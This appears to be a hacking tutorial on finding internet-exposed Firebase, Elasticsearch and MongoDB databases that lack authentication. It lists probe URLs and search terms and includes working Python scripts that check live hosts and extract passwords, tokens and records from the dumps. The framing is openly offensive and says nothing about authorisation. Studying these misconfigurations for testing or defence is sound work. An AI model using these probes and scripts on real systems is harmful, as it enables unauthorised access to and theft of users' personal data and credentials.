Introduction

A database is an organized collection of data, generally stored and accessed electronically. When attacking a web application, one of the main goals is often to compromise the back-end database, since that is where all the sensitive user data lives.

Basic Hacking Databases | Cyber Odisha | Cyber Crime | cyber security
https://www.cyberodisha.com/

Compromising these databases normally involves exploiting a SQL injection vulnerability, but sometimes it is much easier than that. Databases are often exposed to the internet without any authentication, leaving them open for anyone to pillage, as discussed in the following sections.

Google Firebase: –

Introduction

According to Google, “The Firebase Realtime Database is a cloud-hosted database stored as JSON and synchronized in realtime to every connected client”. Who can read and write that JSON is governed by the database's security rules, and the issue arises when developers leave those rules wide open (for example ".read": true at the root) instead of requiring an authenticated user. The vulnerability is the same as every other database misconfiguration covered here: there is no authentication. Leaving a database exposed to the world unauthenticated is an open invitation to malicious hackers.

Misconfigured Firebase Database

When I'm hunting for this I keep an eye out for “*.firebaseio.com” URLs (Realtime Database instances created in regions outside the US use a “*.firebasedatabase.app” host name instead, so watch for that too). If you see either, you know your target is using Google's Firebase Realtime Database. An example domain can be found below:


● vuln-domain.firebaseio.com


If the developer left the rules open, the database is exposed to the world. You can easily view the database by appending “/.json” to the URL, as shown below. Appending “?shallow=true” as well returns only the top-level keys, which is a safer first probe against a large database; a locked-down instance answers with HTTP 401 and {"error" : "Permission denied"} instead of data.

vuln-domain.firebaseio.com/.json


Against a real target this single request returned a dump containing a set of passwords belonging to an organization. An attacker could then leverage those credentials to perform additional attacks on the application.

Summary:-

Finding and exploiting this misconfiguration is extremely easy and requires almost no technical skill. All you need to do is find an application using Firebase, append “/.json” to the URL, and if the rules allow unauthenticated reads you can export the entire DB!
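As an added example (not part of the original post), here is a small Python helper that performs the check described above: it builds the /.json probe URL for a Realtime Database host, classifies the HTTP response, and walks an open dump looking for credential-like keys. The host name, the sensitive-key word list and the sample dump are all constructed for illustration, and the live probe only runs when you pass a host on the command line.

```python
import json
import sys
import urllib.error
import urllib.request

# Assumed list of key names worth flagging in a dump (credentials and secrets,
# the kind of data the post describes).
SENSITIVE_KEYS = ("password", "passwd", "token", "secret", "key", "email")


def probe_url(host, shallow=True):
    """Build the REST URL for the root of a Realtime Database.

    shallow=true makes Firebase return only the top-level keys (each mapped
    to true) instead of the whole tree, so a first probe against a large
    database stays small; drop it to pull the full dump.
    """
    url = "https://%s/.json" % host
    return url + "?shallow=true" if shallow else url


def classify(status, body):
    """Map the HTTP status/body of GET /.json to a verdict.

    A locked-down instance answers 401 with {"error": "Permission denied"};
    an open instance answers 200 with the data, or the literal null when
    the tree is empty.
    """
    if status == 401:
        return "denied"
    if status == 200:
        return "empty" if json.loads(body) is None else "open"
    return "other(%d)" % status


def find_sensitive(node, path="", hits=None):
    """Walk a decoded dump and collect (path, value) for sensitive-looking keys."""
    if hits is None:
        hits = []
    if isinstance(node, dict):
        for key, val in node.items():
            child = path + "/" + key
            leaf = not isinstance(val, (dict, list))
            if leaf and any(word in key.lower() for word in SENSITIVE_KEYS):
                hits.append((child, val))
            find_sensitive(val, child, hits)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            find_sensitive(val, path + "/" + str(i), hits)
    return hits


def probe(host, timeout=10.0):
    """Live check (needs network): fetch /.json?shallow=true and classify it."""
    req = urllib.request.Request(probe_url(host), headers={"User-Agent": "rtdb-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode())


# Constructed sample of what an open database might return for /.json
SAMPLE_DUMP = {
    "users": {
        "u1": {"name": "alice", "email": "alice@example.com", "password": "hunter2"},
        "u2": {"name": "bob", "apiKey": "AIza-not-a-real-key"},
    },
    "settings": {"theme": "dark"},
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", probe(sys.argv[1]))   # e.g. vuln-domain.firebaseio.com
    else:
        for path, value in find_sensitive(SAMPLE_DUMP):
            print(path, "=", value)
```

Run it with a host name to perform the live probe, or with no arguments to see the key walk over the constructed sample. The shallow probe first and the full dump second is deliberate: a production database can be hundreds of megabytes, and the top-level keys already tell you whether it is worth pulling.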

ElasticSearch DB:-

Introduction

You have probably heard of the popular relational database MySQL. Elasticsearch, like MySQL, is a database used to hold and query information; however, it is typically used to perform full-text searches over very large datasets. Another thing to note is that Elasticsearch historically shipped with no authentication at all (the free distribution before 8.0 had security turned off unless the operator enabled it; 8.x turns authentication and TLS on by default on a fresh install), which has caused a lot of security problems, as described in the following sections.

Elasticsearch Basics: –

According to Google, “Elasticsearch is a document-oriented database designed to store, retrieve, and manage document-oriented or semi-structured data. When you use Elasticsearch, you store data in JSON document form. Then, you query them for retrieval.” Unlike MySQL, which stores its information as rows in tables, Elasticsearch stores records called documents. Older versions grouped documents into “types” inside an index (one type could hold many documents), but mapping types were deprecated in 6.x and removed in 8.x, so on a modern cluster you will only see indices and documents.
A document is basically a JSON blob that holds your data, as shown in the example below:

{"id":1, "name":"ghostlulz", "password":"SuperSecureP@ssword"}

In MySQL we use column names, but in Elasticsearch we use field names. The field names in the above JSON blob would be id, name and password. In MySQL we would store all of our tables in a database; in Elasticsearch we store our documents in something called an index. An index is basically a collection of documents.

Unauthenticated ElasticSearch DB:-

Elasticsearch runs an HTTP server on port 9200 (port 9300 is the separate node-to-node transport port) that can be used to query the database. The major issue here is that a lot of people expose port 9200 to the public internet without any kind of authentication, which means anyone can query the database and extract information. A quick Shodan search for port 9200 produces a ton of results.

Once you have identified that your target has port 9200 open, you can easily check whether it is Elasticsearch by hitting the root directory with a GET request. An Elasticsearch node answers with a JSON banner containing the node name, cluster_name, a version block with the version number, and the tagline “You Know, for Search”.

Once you know an endpoint has an exposed Elasticsearch DB, try to find all the indices (databases) that are available. This can be done by hitting the “/_cat/indices?v” endpoint with a GET request (add “&format=json” if you want to parse the list with a script). This lists every index along with its health, document count and size on disk.

This information, along with other details about the service, can also be found by querying the “/_stats?pretty=1” endpoint. To perform a full-text search across the database use
“/_all/_search?q=email”. This queries every index for the word “email”. Note that a search returns only 10 hits by default; add “&size=100” (and page with “&from=”) to pull more. There are a few words that I like to search for, which include:

● Username
● Email
● Password
● Token
● Secret
● Key

If you want to query a specific index you can replace the word “_all” with the name of the index you want to search against.


Another useful technique is to list all of the field names by making a GET request to the “/INDEX_NAME_HERE/_mapping?pretty=1” endpoint. I typically search for interesting field names such as:

● Username
● Email
● Password
● Token
● Secret
● Key

On one exposed instance the mapping output listed field names such as addressable_type and city, along with many more that were too numerous to show.

To find every document that contains a specific field use “/_all/_search?q=_exists_:email&pretty=1” (note the trailing underscore: “_exists_” is the query-string syntax for a field-exists check). This returns the documents that have a field (column) named email.

Again, you can replace “_all” with the name of an index to run the search against that index alone.
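As an added example that is not from the original post, here is a Python helper covering the steps above end to end: it recognises the root banner, builds the URLs the post uses (with size= added, since _search caps at 10 hits by default), and parses the JSON form of the _cat/indices, _mapping and _search responses to pull out index names, field names and the actual records. The base URL, the word list and the sample responses are constructed for illustration and shaped like a 7.x cluster's output.

```python
import json
import urllib.parse
import urllib.request

# Assumed word list for "interesting" fields (the same list the post uses).
INTERESTING = ("username", "email", "password", "token", "secret", "key")


def is_elasticsearch(banner):
    """GET / on 9200 returns a JSON banner; the tagline plus version block is the tell."""
    try:
        doc = json.loads(banner)
    except ValueError:
        return False
    return doc.get("tagline") == "You Know, for Search" and "version" in doc


def endpoints(base, index="_all", term="email", size=100):
    """The URLs used in the post; size= is added because _search returns 10 hits by default."""
    q = urllib.parse.quote(term, safe="")
    return {
        "indices": base + "/_cat/indices?v&format=json",
        "stats": base + "/_stats?pretty=1",
        "search": "%s/%s/_search?q=%s&size=%d" % (base, index, q, size),
        "mapping": "%s/%s/_mapping?pretty=1" % (base, index),
        "exists": "%s/%s/_search?q=_exists_:%s&size=%d" % (base, index, q, size),
    }


def parse_cat_indices(body):
    """_cat/indices?format=json -> [(index, doc_count)], largest first; hidden .* indices dropped."""
    rows = json.loads(body)
    out = [(r["index"], int(r.get("docs.count") or 0)) for r in rows if not r["index"].startswith(".")]
    return sorted(out, key=lambda r: -r[1])


def _walk(props, prefix, out):
    for name, spec in props.items():
        out.append(prefix + name)
        if isinstance(spec, dict) and "properties" in spec:   # nested object field
            _walk(spec["properties"], prefix + name + ".", out)


def flatten_mapping(body):
    """_mapping output -> {index: [dotted field names]}.

    7.x and later put fields under mappings.properties; 6.x and older add a
    type layer (mappings.<type>.properties), so both shapes are handled.
    """
    result = {}
    for index, idx_body in json.loads(body).items():
        mappings, fields = idx_body.get("mappings", {}), []
        if "properties" in mappings:
            _walk(mappings["properties"], "", fields)
        else:
            for type_body in mappings.values():
                if isinstance(type_body, dict) and "properties" in type_body:
                    _walk(type_body["properties"], "", fields)
        result[index] = fields
    return result


def interesting_fields(fields):
    """Keep only field names containing one of the INTERESTING words."""
    return [f for f in fields if any(w in f.lower() for w in INTERESTING)]


def sources(body):
    """_search response -> the _source documents, i.e. the actual records."""
    return [hit.get("_source", {}) for hit in json.loads(body)["hits"]["hits"]]


def get(url, timeout=10.0):
    """Live fetch helper (network required); the parsers above work on its output."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode()


# Constructed sample responses (not captured from any real host).
SAMPLE_BANNER = '{"name":"node-1","cluster_name":"es","version":{"number":"7.10.2"},"tagline":"You Know, for Search"}'
SAMPLE_CAT = json.dumps([
    {"health": "green", "status": "open", "index": ".kibana_1", "docs.count": "12"},
    {"health": "yellow", "status": "open", "index": "customers", "docs.count": "48213"},
    {"health": "yellow", "status": "open", "index": "logs-2019", "docs.count": "901"},
])
SAMPLE_MAPPING = json.dumps({"customers": {"mappings": {"properties": {
    "city": {"type": "keyword"}, "email": {"type": "keyword"}, "addressable_type": {"type": "keyword"},
    "auth": {"properties": {"password_hash": {"type": "keyword"}, "reset_token": {"type": "keyword"}}},
}}}})
SAMPLE_SEARCH = json.dumps({"hits": {"total": {"value": 1}, "hits": [
    {"_index": "customers", "_id": "1", "_source": {"email": "alice@example.com", "city": "Bhubaneswar"}}]}})

if __name__ == "__main__":
    base = "http://127.0.0.1:9200"   # assumed target
    print(is_elasticsearch(SAMPLE_BANNER), endpoints(base)["exists"])
    print(parse_cat_indices(SAMPLE_CAT))
    for index, fields in flatten_mapping(SAMPLE_MAPPING).items():
        print(index, interesting_fields(fields))
    print(sources(SAMPLE_SEARCH))
```

Against a live host, feed get(endpoints(base)["indices"]) into parse_cat_indices to pick the biggest user-data index, then get(endpoints(base, index=name)["mapping"]) into flatten_mapping to see which fields are worth a targeted _exists_ query.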

Summary

Elasticsearch is just another database where you can store and query information. The major problem is that people expose the unauthenticated web service to the public. With unauthenticated access to that web service an attacker can easily dump the entire database. Always be on the lookout for port 9200.

Mongo Database:-

Introduction

Like Elasticsearch, MongoDB is a NoSQL database that uses JSON-like documents to store data. Also like the other databases we have talked about, MongoDB does not enable authentication by default: it is up to the operator to turn on access control, which they often forget. Since version 3.6 MongoDB at least binds to localhost by default, so an instance reachable from the internet usually means someone set bindIp to 0.0.0.0 without also enabling authentication.

MongoDB:-

If you're searching for MongoDB instances, be on the lookout for port 27017. As mentioned earlier, MongoDB doesn't enable authentication by default, so to test for this vulnerability just try to log in. To do this I normally just use the mongo CLI (the legacy mongo shell, or mongosh on current installs), as shown below:

mongo ip-address-here

Once connected, try issuing a command such as show dbs. If you get an error like “command listDatabases requires authentication” (error code 13, Unauthorized) or “not authorized on admin to execute command”, the endpoint has authentication enabled.

However, if you can run arbitrary commands against the system then authentication has not been set up and you can do whatever you want.

Summary

If you see port 27017 open (or any other MongoDB-associated port, such as 27018 and 27019 used by shard and config servers), make sure to test the endpoint to see if it's missing authentication. Exploiting this misconfiguration is as easy as connecting to the database and extracting the data. This is as easy as it gets, folks.

Conclusion


If an application needs to store data, chances are it's being stored in a database. These databases hold all kinds of sensitive information: passwords, tokens, private messages and everything else. That's why databases are always popular targets for hackers. Since they are such popular targets you would think they would be fairly secure, but they often aren't. A lot of databases ship without authentication enabled, so if one is connected to the internet anyone can connect to it and extract the information it holds.

